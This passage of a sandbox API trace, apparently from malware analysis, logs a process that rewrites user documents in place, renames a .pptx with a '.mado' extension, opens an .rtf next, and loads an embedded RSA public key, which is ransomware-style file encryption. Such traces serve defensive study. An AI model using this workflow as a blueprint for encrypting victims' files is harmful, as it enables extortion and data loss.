CryptReleaseContext (hProv=0x321958, dwFlags=0x0) returned 1 [0205.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.803] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.803] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.803] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x162c0) returned 0x3b81690 [0205.803] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b668e8 [0205.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea48 [0205.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66930 [0205.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea60 [0205.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea90 [0205.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fead8 [0205.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feaa8 [0205.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0205.804] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0205.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0205.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea90 | out: hHeap=0x2c0000) returned 1 [0205.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feaa8 | out: hHeap=0x2c0000) returned 1 [0205.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fead8 | out: hHeap=0x2c0000) returned 1 [0205.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fead8 [0205.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0205.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32feaa8 [0205.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0205.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fea90 [0205.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b72c98 [0205.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b72db0 [0205.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c98 | out: hHeap=0x2c0000) returned 1 [0205.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feaa8 | out: hHeap=0x2c0000) returned 1 [0205.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea90 | out: hHeap=0x2c0000) returned 1 [0205.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fead8 | out: hHeap=0x2c0000) returned 1 [0205.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.805] GetCurrentThreadId () returned 0x600 [0205.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75968 [0205.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b69ed8 [0205.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321958 [0205.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75d88 [0205.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.805] GetCurrentThreadId () returned 0x600 [0205.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75c80 [0205.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75b78 [0205.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fead8 [0205.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea90 [0205.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feaa8 [0205.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea78 [0205.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feaf0 [0205.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feac0 [0205.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feb08 [0205.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea90 | out: hHeap=0x2c0000) returned 1 [0205.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea90 [0205.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fead8 | out: hHeap=0x2c0000) returned 1 [0205.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72c98 [0205.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feb08 | out: hHeap=0x2c0000) returned 1 [0205.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b72ec8 [0205.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0205.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72b80 [0205.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea90 | out: hHeap=0x2c0000) returned 1 [0205.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74b68 [0205.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c98 | out: hHeap=0x2c0000) returned 1 [0205.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75a70 [0205.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321958 | out: hHeap=0x2c0000) returned 1 [0205.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75c80 | out: hHeap=0x2c0000) returned 1 [0205.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a70 | out: hHeap=0x2c0000) returned 1 [0205.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0205.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0205.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0205.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72ec8 | out: hHeap=0x2c0000) returned 1 [0205.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0205.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feac0 | out: hHeap=0x2c0000) returned 1 [0205.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0205.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feaf0 | out: hHeap=0x2c0000) returned 1 [0205.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feaa8 | out: hHeap=0x2c0000) returned 1 [0205.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea78 | out: hHeap=0x2c0000) returned 1 [0205.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0205.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0205.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75d88 | out: hHeap=0x2c0000) returned 1 [0205.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea60 | out: hHeap=0x2c0000) returned 1 [0205.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66930 | out: hHeap=0x2c0000) returned 1 [0205.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75b78 | out: hHeap=0x2c0000) returned 1 [0205.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0205.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72db0 | out: hHeap=0x2c0000) returned 1 [0205.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0205.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0205.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0205.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.809] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x162b4, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x162b4, lpOverlapped=0x0) returned 1 [0205.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0205.809] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x162b9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.809] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0205.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0205.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0205.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0205.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0205.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0205.810] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0205.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0205.810] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.810] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.810] CloseHandle (hObject=0x63c) returned 1 [0205.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77968 [0205.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3b74b68 [0205.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77968 | out: hHeap=0x2c0000) returned 1 [0205.811] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\pNQA4jq_V4.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\pnqa4jq_v4.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\pNQA4jq_V4.pptx.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\pnqa4jq_v4.pptx.mado")) returned 1 [0205.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.812] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a67c8 | out: hHeap=0x2c0000) returned 1 [0205.813] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee1da0c0, ftCreationTime.dwHighDateTime=0x1d5da22, ftLastAccessTime.dwLowDateTime=0xd29b7290, ftLastAccessTime.dwHighDateTime=0x1d5e45a, ftLastWriteTime.dwLowDateTime=0xd29b7290, ftLastWriteTime.dwHighDateTime=0x1d5e45a, nFileSizeHigh=0x0, nFileSizeLow=0x185de, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tAUHYQIWpbu.rtf", cAlternateFileName="TAUHYQ~1.RTF")) returned 1 [0205.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0205.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6) returned 0x3a67c8 [0205.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0205.813] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\tAUHYQIWpbu.rtf") returned=".rtf" [0205.813] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\tAUHYQIWpbu.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\tauhyqiwpbu.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.814] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=99806) returned 1 [0205.814] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.816] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x185b8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.816] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.819] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.819] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x185de, lpOverlapped=0x0) returned 1 [0205.820] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.820] lstrlenA (lpString="-----BEGIN PUBLIC 